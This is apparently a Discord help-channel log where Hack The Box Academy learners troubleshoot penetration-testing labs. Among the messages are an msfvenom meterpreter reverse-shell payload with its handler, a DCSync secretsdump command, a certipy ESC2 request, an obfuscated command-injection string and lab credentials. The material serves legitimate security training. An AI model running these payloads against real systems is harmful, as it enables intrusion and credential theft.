I will open in mobile

https://academy.hackthebox.com/module/147/section/1334

You can dm me

Guys, who can help me with DACL II SA 2nd question?
I believe the target user has to trigger his logon script but he hasn't. What I do wrong?

Hello all! sorry for all the questions. Im working on the Citrix breakout section. Im trying to import PowerUp.ps1 but getting an powershell error and cant set the execution policy. any ideas?

Doing the Medium foot printing end of module lab. I am getting a permission denied error every time I try to cd into the folder that I mounted with the nfs share. I have tried this in my own VM and in their in built lab. It says that the permissions for the folder are for nobody and nogroup which should make everyone use the same anonymous account? I could literally list the contents with the rpcinfo nmap script. What is going on?

Never mind. I got it. NGL when I found out what you actually had to do, it kind of pissed me off. I literally tried to modify my personal groups and UIDs and GIDs because of the authentication and authorization bit in the actual lesson. Then enumerated every single other service to no avail. Feels very gimicky and like a gotcha. How can I prepare myself for something like that on the actual exam? I wouldn't have even come close to considering that as even a possibility.

found the answer, had to start powershell a different way

Take a deep breath and work methodically, always try the simple solutions

Hey do you wanna try something that may sound silly? Try adding this -o vers=3 im not at my system to check myself

@silent kindle please dont spoil passwords

Admittedly, it was a lesson in persistence. I knew that it was strange from the rip and instead of researching it, I let it go. Hard lesson.

Will be back at my computer after like 30 mins, I will give it a rip

Im just more curious because it is a common roadblock in that assessment

I still have the machine pulled up, I'll get you that feedback. You're talking about using it as an additional option on the mount command?

Yep

https://www.reddit.com/r/netapp/s/cSBqtP04FF this is why im curious

sorry, can I get some help on question 2 on this module https://academy.hackthebox.com/module/147/section/1323. I'm getting this error [CRITICAL] Error during reading the volume: not enough byte read.

on the windows host
Get-FileHash -Algorithm md5 filename.ext (replace with the actual file and extension)
on the linux host
md5sum filename.ext

if they match, then no errors in the transfer
if they don't you'll need to retransfer over

I'm trying to mount the .vhd in linux

i'm aware... this is to check the filehash

to ensure it isn't corrupted :)

ohh one sec

you want to know the hash?

Used sudo mount -t nfs <target-IP>:/<target-share> ./tech_support_nfs_share/ -o nolock,vers=3 No change, still bad permissions. I imagine nobody:nobody is a different case than nobody:nogroup. Definitely gonna have to set this one up in the lab

yeah it looks like there's some other stuff going on

¯_(ツ)_/¯

in general though "permission denied" is typically just "sudo to do it"

May I send you a Python code that uses a dictionary attack? I have an error in it and I don't know what it is.

no

Ok, what are the allowed things?

my dms aren't open for rando code review. and it sounds like you're using your code for doing something illegal

I don't use it for education.

well this channel is specifically for help with the learning modules on https://academy.hackthebox.com to access more of the server you'll have to read and follow the list of instructions in #welcome. i also suggest reading the #rules

if i had a nickel for every time someone's tried to use the "for eduucational purposes" excuse

if you're using it to attack instagram or other things like that: it's illegal

Ok sorry

In any event for some reason, my ntlmrelayx attack doesnt appear to be working in the module even though i followed all the instructions. How many minutes is it expected to take
https://academy.hackthebox.com/module/84/section/809

Srry guys i dont know where to ask this question, combined that i have some channels blocked. But i was doing the FAWN machine and on this question** What is the command we need to run in order to display the 'ftp' client help menu?** i clearly have the answer, searched it many times over but it says its incorrect on all possible formats

I got mine pretty quickly after just a minute or so

Did you drop it to HR or IT-Tools

IT-Tools

Are you using slinky or drop-sc?

drop-sc

When I did it I used slinky and responder instead of ntlmrelayx and that worked for me

Im on the third question where I need to relay the hash

Oh my bad yeah I know what you mean then I also had issues with that one. I restarted the machine and just used slinky and then cleaned it, and then I was able to get it using drop-sc.

wait got it to work

Im not sure why it didn't give it to me until I restarted im not sure if you have to clean it for it to give you the next hash or what

oh nice

Relaying is cool as hell dude

hey guys if someone could lend me some hints on assembly module assessment. i was able to write the code to XOR each 8 bytes pushed into the stack memory. i looped trough it and got several hex values. what type of answer does htb want? a flag like format?

I had no issues at all with the rest of the lab. I actually thought that lab was really well done. Very thought through.

nvm got it finally

Hi, I'm stuck on the last question here https://academy.hackthebox.com/module/147/section/1327. I'm able to log in into the smb server and get the flag.txt. The issue is that the flag.txt is empty? not sure what to do from here

I don't know why that was happening with you but I faced no such issue. I used mount -t nfs IP:/ target-NFS/ -o nolock and was able to traverse into the mounted share

openvpn

I typed it but like Open VPN

And it didn't respond to it LoL

Then OpenVPN worked

Thank you for your response anyways XD

I have a doubt, where can I find the root flag?

the module question should say

If you're doing boxes, you'll need to follow the instructions in #welcome to gain access to #boxes.

Ohhh, Okay

Can someone give me a hint for password stuffing section of the Password attacks module? I am rather stuck.
Here is the description:
SSH to 10.129.202.64 (ACADEMY-PWATTACKS-NIX01) with user "sam" and password "B@tm@n2022!"

I first looked for any files which might contain the passwords such as in /etc/mysql/ (there were none) and tried to login to the mysql server with sam's credentials and default credentials. Unfortunately, this also didn't work.

@lament oak Sorry to bother you, I have been working on Credential Hunting in Network Shares for a long time and I haven't solved the first problem. If you have solved it, could you share your notes or tell me how to do it?

No idea

I'm stuck too

Hey guys! Question to people, who has passed Attacking Enterprise Networks blindly. How did you find password in the logs on monitoring.inlanefreight.local host? What was you thought process?

I was getting error while i was doing pass the certificate

Hint: The method you need to use is mentioned on the section page.

Has anyone completed a cobblestone machine ?

#1403762269376217182

Okay bro

its mssql right?

yes

hol up im missing somethin

nvm i got it

thx

Ligolo ng listener : listener_add --addr 0.0.0.0:30000 --to 127.0.0.1:10000 --tcp
trying to run eternal blue. but cant get rev shell coz of lhost and lport misconfig
what should i set lhost & lport as?

1. 127.0.0.1 & 10000
2. 0.0.0.0 & 10000
3. Internal-ip & 30000
4. something else

guys in active direcroty attacks module's DCSync part, I'm running impacket's secretdump.py but there's no output

what's the error you getting?

It's just all the traffic to 0.0.0.0, try localhost:10000

on this command-
secretsdump.py -outputfile inlanefreight_hashes -just-dc 'INLANEFREIGHT.LOCAL/adunn@10.129.17.183' -debug
I'm getting this-
Password:
[+] Exiting NTDSHashes.dump() because SAMR SessionError: code: 0xc00000df - STATUS_NO_SUCH_DOMAIN - The specified domain did not exist.
[*] Cleaning up...

np..btw it should work with windows auth

adunn

does that user exits?

yea

It's DNS.

have you modified /etc/hosts

ooh, no. ill do that

There you go.

thanks :)

||echo "ip domain.tld" | sudo tee -a /etc/hosts||

still nothing :(

i think there must be domain controller name

is doamin.tld is your domain controller?

i think try putting this "INLANEFREIGHT.LOCAL <its ip>

"One of the easiest things we can do when initially poking around on a Windows host is to get a listing of the directory we are currently working in. We do that with the dir command."

Am I dumb, or why doesn’t it work?

IP and port of the machine where the listener is created. IP of --addr 0.0.0.0:30000 and port should be 30000. Hope that's clear.

Read this: https://arth0s.medium.com/ligolo-ng-pivoting-reverse-shells-and-file-transfers-6bfb54593fa5

What about hidden files/folders?

already tried dir /a & dir /a:h & dir /adh and its not working either

Which module and section is that from?

Introduction to Windows Command Line / System Navigation

nevermind, i found it

still ty for the help

Could anyone help with Password attacks module skills assesment?
I am having a problem with access to the other machines in the internal network they appear unreachable. And i do not know if my config is wrong or what is happening. I already tried the beginning I saw in this write up: https://medium.com/@ravsau00/beyond-phishing-a-multi-stage-attack-to-control-an-active-directory-environment-8d9e7d0c7eb9

solved :) i had to be on the internal network, so used ligolo

Hi am getting ths error on the Attacking Enterprise Networks Lateral Movement module channel 7: open failed: connect failed: Temporary failure in name resolution
<SNIP>
channel 3: open failed: connect failed: Temporary failure in name resolution
channel 4: open failed: connect failed: Temporary failure in name resolution

You need to pivot,you need yo make tunnel to access internal subnet

Tools like ligolo-ng will make your life a bit easier

Thank you! There was also an answer in the cheat sheet...

didnt worked

didnt worked either

If you are using metasploit you could probably use a bind payload instead of reverse, if you are having issues with it connecting back to you.

will it work with eternal blue?

Are you running the exploit with metasploit or is it a EB exploit from GitHub?

yup

is there a way to increase timeout? i am getting this
tried set wfsdelay doesnt helped

Yeah as long as you use the correct payload and configure things correctly.

i think its working just getting timedout coz of latency of vpn

Which module/section are you working on?

well its not a module i am doing pro labs

This technically belongs in the prolabs channel. I'm on my phone but when I get into work and can look at what you're trying to do a little better.

Glad to hear that

hallo im new member, how to create vps with digital ocean?? thank you

Just thought it was worth posting - currently can't complete the Internal Password Spraying - Linux module. Restarted the machine 4 times now, every time I ssh into the host the lab crashes

This channel is related to modules content only

👀

where to ask about vps instalation? thank you

I guess in #hacker-lounge

That has nothing to do with HTB Academy and is easily something you can Google. Suggest going to #welcome and read over #rules

yes thank you

okay, did it still work or nah?

nope still struggling haha

Hi I have a question regarding use of Kali VM with VPN for academy. When I use my own Kali VM with VPN, I am not able to enumerate properly. The results are different to when I am using Pawnbox.
For example I am doing IPMI in Footprinting module.
This is what I get from my own VM.

not even bind shell?

what exactly you are trying to do?

https://www.google.com/search?q=creating+a+vps+with+digital+ocean

But when using Pwbox.. I can get the answer.

Can you please help me fix this issue.

can i dm? maybe

I would suggest changing the region.

Thanks mate.. I will try doing that.. ANy other solution like setting up MTU on tun0 ??

to me it just looks like good old vpn issue, is it UDP or TCP?

Is there any way we can check if the VPN i am connected is UDP or TCP?

 ->  grep "proto" academy_regular.ovpn

Thanks mate.. It is udp protocol. That might be the reason it is dropping packets.

Use tcp.

I don't really know for sure what you actually did there so can't really understand the issue you're facing

can i dm you?

leave me a message and I'll get back to you soon as I am busy elsewhere right now

I am trying to do ctf and i am connected to VPN but its showing slow speed and i cant ping the target, why ?

I am using openvpn btw

windows most prolly

Its a linux target and i am using atch btw

I dont know what to do

Please help me i havent done CTF for 2 days

Hello. I just joined and I haven't done a CTF. Where should I start?

Idk

Figure out yourself

Thats how i do it

Judt watch any walk through of a random easy CTF and you will understand

have I done something wrong with this or does it need to be encoded?
%0a$fin'd'${IFS}${PATH:0:1}$(rev<<<rsu)${PATH:0:1}${rev<<<erahs}${rev<<<c7}gre'p'${ro'o't}${tai'l',-n,1}
https://academy.hackthebox.com/module/109/section/1039

Sounds like a plan. Thanks for that. Where would I find one at?

i need help with these questions from DNS section of Footprinting module

What have you tried so far? You can DM me if you'd like.

Getting started - Alternative method
Hi everyone, can someone explain me how to solve this errors? I have already set the necessary options to run this nibbleblog exploit, i dont know why

i changed it, but it still doesn't work

Can i DM ?

VPN config?

or exploit config?

LHOST set at the IP for tun0 interface, the port set at 4445

What rule

Again

LMAO

Sorry im a newbie

bro needs to change his math vote

https://tenor.com/view/hackers-hack-the-planet-taogifs-zero-cool-crash-override-gif-5753306679943930050

?

Can someone give me a brief description of what topics is being discuss here. Ps Thanks

@bold birch Yes

Currently

Thanks

Its on Attacking Enterprise Networks Lateral Movement

This is from AEN and is over Tier 0. If you are having issues, I recommend asking if anyone is willing to go to DMs to discuss AEN content.

could you be more specific please?

I didn't say I had the time to go to DMs to discuss that. With that being said don't DM unless someone has agreed to it prior.

Hey I've got some time now, you can DM if you are still stuck.

DMed you

Anyone else on US East having VPN problems? My VPN keeps restarting on me please @ with replies

Is there any channel for Sherlocks questions ?

"No Access" 🙁

#welcome

Thanks a lot !

I need some help in shells and payload module, the final machine in that module 'the live engagement'. In that it need to be connected through a RDP but its too slow. is there any way to make it without rdp

pentest in a nutshell

section :windows initial

i am trying to connect to smb through crackmapexec

but when i try to copy the file

i got error reading devs file ; netbios connection with host timeout

i got it multiple times

You can just setup the RDP host as a pivot.

Can you explain it in detail pls.

Can anyone help me with the Credential Hunting in Network Shares part? Please DM me, thanks.

I honestly can't remember if I tried without sudo after finding out what the issue was and how I needed to interact with it after that. If the privileges that you mount the folder with have anything to do with access permissions, this may be why you didn't have any issues.

hellooooo guyssssss

nevermind I got it

thats where I am currently stuck on that module too

I completed this module before but it was updated so now I have to go back and complete the new parts

thats a yikes moment

I assume going for the cpts ?

Yep, and only have this and AEN left. Same with you?

Get-ChildItem -Path "\\DC01.inlanefreight.local\SHARES" -Include *.ini,*.cfg,*.ps1,*.bat -Recurse -ErrorAction SilentlyContinue | Select-String -Pattern 'passw|cred|initial'I used this command, and only three shared resources showed output, and the content was very large. I tried some of the passwords in content, but they were all wrong.

yeah expect far behind only completed about 65% and only understand ~30 to 40% once I go for a second round with detailed notes I think Id be ready for the ctps

Please help me, I'm stuck on this for 4 days

What question are you on?

One of the shares mendres has access to contains valid credentials of another domain user. What is their password?

Get-ChildItem -Recurse -Include *.ext \\Server\Share | Select-String -PatternShould I run this code? I've reviewed it three or four times, but it always fails with insufficient permissions. When I use it in a place with permissions, the output is incredibly long. Is it because I haven't specified the pattern correctly?

Why don't you use the examples from the module?

Can I DM you?

@winter shard Please take care not to post content from modules above tier 0

Hey Guys in pass the ticket from windows section from password attacks I don't see john's ntlm or his tgt nothing from dumps. Any hint on what I'm missing

Has anyone completed the module LLM Output Attacks? I need some hints for the skilss assessment. 🙂

Hey someone have CRTA cert? Is it relevant in the field or not really I’m looking it up

silly one, how would you go about downloading the tools inside C:\tools of the AD Enumeration module? as its 1.25GB which is currently at 150byes / s ... yes bytes. it stopped estimating the time to download at around 23h

Get the tools from the source

I know I should compile them myself, I want to take the tools as they currently exist and test against the skills assessment...

Are you using smb?

#careers-and-certs

was transferring over SMB to begin with but switching to SMB

was transferring over RDP*

Yeah that probably why plus the vpn slowness

Hey Everyone 👋

I just finished the hard lab for the enumeration module. I have to say I am very impressed with how they make those labs feel.

Please read #welcome and #rules it will explain how to get verified

Then you can chat in #general 😄

Done

If you did follow the instructions, you would be identified now 🙂

I'm not verified yet?? 🤔

Didn’t follow and execute the three steps from #welcome

Oh OK but Tomorrow cuz I just turned off my pc and all credentials in it 👍

Bye 👋

No worries, have a great night

Chill guy interaction

https://tenor.com/view/chill-guy-chill-guy-just-a-chill-guy-relax-gif-1579445140409713118

This is going to sound however it sounds, I am going for the cpts and just finished footprinting. The next two modules are information gathering and vulnerability assessment. I'm going to be real, often when a course includes information gathering it is a whole lot of theory and memorization instead of hands on doing because of the nature of open source intelligence. As far as vuln assessment goes, I know it is important for the "job" to meet those legal checkboxes for a company, but it isn't exactly enticing to do or read. Long story short, will it hurt me going forward if I skip these two modules in the pentest pathway then come back to them later to finish them as required for the cert? Or are the exercises offered in both modules an interesting and good take on the subject and worth doing immediately?

This isn't really the place for me to explain this in detail, as it technically isn't a requirement for that Skills Assessment and the information I provide may end up adding another element to something you are already learning. I would finish it with the provided content, i.e., the attack box you RDP into and then if you are doing the CPTS path, circle back to this after the Pivoting module and use what you learn in that module to use the RDP host as a pivot host. By that point you should also understand pivoting better, so I would also recommend some self-learning and add ligolo to it for pivoting.

with rubeus you can specify /user:john and the mimikatz one with /extract the username should be at the end

The information gathering module is fairly useful for web stuff. Skipping the vuln assessment (for now) is fine though

Don't let its name fool you

You can compress then transfer

Its what I did if I recall

Hello smart minds, I am new here ...
Glad to join you all

Please any insight or roadmap for a beginner

I will appreciate

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

@narrow rover 👆

Thank you it was the machine fault that I couldn't find johns ekeys

Restarting it and then tried again it worked

But thanks for answering

Is it useful in the OSINT way or is it useful in a different way? Scrolling through the sections I see vhosts, robots.txt, and .Well-Known URIs that has potential to be useful on an actual box not focused on OSINT.

but beyond that, you may have to clue me in on why its important.

Thanks

Yep I recently redid it, so I have it fresh on the brain

Yooo

Its in general useful for stuff for web related stuff. Also, its called "information gathering - web edition" so its gonna focus on web stuff

How to open my genral

Theres instructions in #welcome for linking your account

Hello All, Im super stuck at Web Attacks -> Local File disclosure, where Im just trying to verify the vulnerability exists or not,

<!DOCTYPE email [
<!ENTITY company "Inlane Freight">
]>

but in repsonse im recieving @company;

where Im wrong

Usually its &company; not @company;

oh yes

got it

@sick stump don't leak passwords

i covered it

No you didnt

Spoiler tag does nothing

oh wait im so dumb

But anyway

Each service contains a unique user

i put a red bar on it not spoiler

You will not reuse the same credentials on a service

wsl --install -d Ubuntu
Downloading: Ubuntu
Installing: Ubuntu
WSL2 is not supported with your current machine configuration.
Please enable the "Virtual Machine Platform" optional component and ensure virtualization is enabled in the BIOS.
Enable "Virtual Machine Platform" by running: wsl.exe --install --no-distribution
For information please visit https://aka.ms/enablevirtualization
Error code: Wsl/InstallDistro/Service/RegisterDistro/CreateVm/HCS/HCS_E_HYPERV_NOT_INSTALLED

Hi guys can anyone help with this error, nested VM is enabled on the virtual box then also I am not able to install ubuntu why is it so?

You didn't block it out in the command line

oh

You dont need to follow the setting up module 100%

ah gotcha thanks

You have winrm access: I suggest getting a list of c:/users/ to speed things along

I am not following that but isn't this is the way to install a distro using wsl

Meterpreter Tunneling & Port Forwarding on the module Pivoting, Tunneling, and Port Forwarding:

Solution to msfvenom segmentation fault while trying to run backupjob.

ubuntu@WEB01:~$ ./backupjob 
Segmentation fault (core dumped)

First -
Try to use stageless meterpreter payload -

msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=KALI-IP LPORT=9091 -f elf -o backupjob

Second -
Specify the payload in the payload options

set payload linux/x64/meterpreter_reverse_tcp

It should look like this -

msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=KALI-IP LPORT=9091 -f elf -o backupjob

then after copying to the Pivothost

msfconsole -x "use exploit/multi/handler; set payload linux/x64/meterpreter_reverse_tcp; set lhost 0.0.0.0; set lport 9091; exploit"

BINGO!

Nested virtualization is virtualization within a virtual device... and its a pain

yeah thats the first thing that got to my mind, thanks for the help marcie 🙏 ❤️

so there is no way to do that? there should be right?

Also it says "hyperv not installed" that'd be on your vm

Please guide me what was the difference why using @ didint work

Its just how the tag is called

although i solved it

I use the following commands to do that but still the same error

dism.exe /online /enable-feature /featurename:VirtualMachinePlatform /all /norestart
dism.exe /online /enable-feature /featurename:Microsoft-Hyper-V-All /all /norestart
dism.exe /online /enable-feature /featurename:Microsoft-Windows-Subsystem-Linux /all /norestart

Its explained in the reading

Not sure what academy module its related to to where you need to install Ubuntu in a nested vm

I suggest #homelab-sysadm or #1024429874246590575 since it has nothing to do with any of the modules

How do you sync time on HTB pwn box I need it for a module

it's not working with any other distro as well

Theres "faketime" and such

@fathom pendant Small question, is there a way i can interact with an smb server using nxc the same way i can interact with it using smbclient ?

It needs spefic time fromm the DC

wdh why did it do that

oops

Again this has nothing to do with hackthebox academy. I told you a better place to ask so youre not flooding the chat with asking for random help

The same? No, similar? Sure

Look into the nxc docs

i know it can list shares but thats about it

It can do more

ok ima expirement a bit thanks dude 🙏

https://www.netexec.wiki/smb-protocol/enumeration

Im stuck on the kerberos auth I need to get the time to sync is it okay if I DM you @fathom pendant

No, ive never had to do any time sync stuff. So im not familiar enough with the commands, but you can search this chat

It also helps to know the module and section youre working on

It for the AEN https://academy.hackthebox.com/module/163/section/1550

i got a account but I need to do spns for kerberoasting

Ah, I did that module blind

ctrl-f in this channel and search for the keywords like "faketime" or "ntpdate"

The problem is I am using the pwn box and Failed to set ntp: NTP not supported

Then faketime ig

and most of the people doing it have used there own VM

¯_(ツ)_/¯

Figured it out by guessing 🙂

Well i definitely dont recommend guessing lol

trying now, thanks 🙂

hello.
Currently doing Skills Assessment - Password Attacks and stack on J server, found some admin pass, searched through shares on F and found old pass of h... and files for pass manager. But nothing of that I found can decrypt the files.
Any hints?

https://academy.hackthebox.com/module/236/section/2540
Does anyone know how to fix
[!] Failed to connect to endpoint mapper: Could not connect: [Errno 113] No route to host

I can ping the ip-adress and lab-LAB-DC-CA

└─$ certipy req -u '*******' -p '**********' -dc-ip 10.129.44.56 -ca lab-LAB-DC-CA -template ESC2 -upn *******
Certipy v5.0.3 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[!] Failed to connect to endpoint mapper: Could not connect: [Errno 113] No route to host
[!] Use -debug to print a stacktrace
[-] Failed to get dynamic TCP endpoint for 91AE6020-9E3C-11CF-8D7C-00AA00C091BE
[-] Got error: Failed to get DCE RPC connection
[-] Use -debug to print a stacktrace

┌──(kali㉿kali)-[~]
└─$ ping lab-LAB-DC-CA 
PING lab.local (10.129.44.56) 56(84) bytes of data.
64 bytes from lab.local (10.129.44.56): icmp_seq=1 ttl=127 time=882 ms
64 bytes from lab.local (10.129.44.56): icmp_seq=2 ttl=127 time=14.2 ms
^C
--- lab.local ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1000ms
rtt min/avg/max/mdev = 14.219/448.146/882.074/433.927 ms

This isn't the correct channel. If this is career related it would be more appropriate in #careers-and-certs

Try adding the -debug to the end

certipy req -u '****l' -p '****' -dc-ip 10.129.44.56 -ca lab-LAB-DC-CA -template ESC2 -upn *** -debug 
Certipy v5.0.3 - by Oliver Lyak (ly4k)

usage: certipy [-v] [-h] [-debug] {account,auth,ca,cert,find,parse,forge,relay,req,shadow,template} ...
certipy: error: unrecognized arguments: -debug

That is sily -debug unrecognized ???

Sorry after 6 times

[!] Use -debug to print a stacktrace
[*] Requesting certificate via RPC
[*] Request ID is 64
[*] Successfully requested certificate

Yeah that's is wonky. Did you install that tool?

Fun fact hashcat has a mode that can decrypt the file directly

dont say...

I have the hashcat example hashes wiki page saved up

Iirc you may be able to run hashid -m filename to check

bruh, i also have it, but didnt even think hashcat can be used for that file type...
Anyways thanks, just cracked password

doesnt hurt to try ¯_(ツ)_/¯

It feels like a dumb question but.. "Windows Attacks & Defense - Kerberoasting", how do I access the Kali image that has the passwords.txt file for kerborasting the ticket's hash ? I am connected through my Pwnbox, generated the WS01, but thats a W11 host. Trying to ssh on the IPs of the previous documentation (Windows Attacks & Defense - Overview) but it timesout

also nmaped the network of the W11 host but its the only host there

Thx in advance for all help

(accessing the Kali machine is not part of the flag, its part of the doc, but the IPs mentionned dont work)

Ssh to the kali box from the windows host

Hey guys in the Password Attacks module, https://academy.hackthebox.com/module/147/section/1328 for the question "Use the credentials provided to log into the target machine and retrieve the MySQL credentials. Submit them as the answer. (Format: <username>:<password>)"

i need a nudge, i tried to use the default credentials for the mysql service and it just kept saying the password is incorrect

I googled a bit and saw a reccomendation to check if the server is running in the first place, and it looks like thats the case but its still not working

any help

same issue, getting a timeout, at least for the 172.16.18.20 IP

Try resetting the machine, changing vpn regions

Theres a default credentials cheat sheet in the module

yah i used it but nothing came up right

Try every possible default credentials you see on the googled table

oh so not the actual table itself from the pip package

You'll need to ssh in then try

There is a GitHub repo i guess that contains some default credentials for the service. Afaik

old school brute force style

It exists in the pip package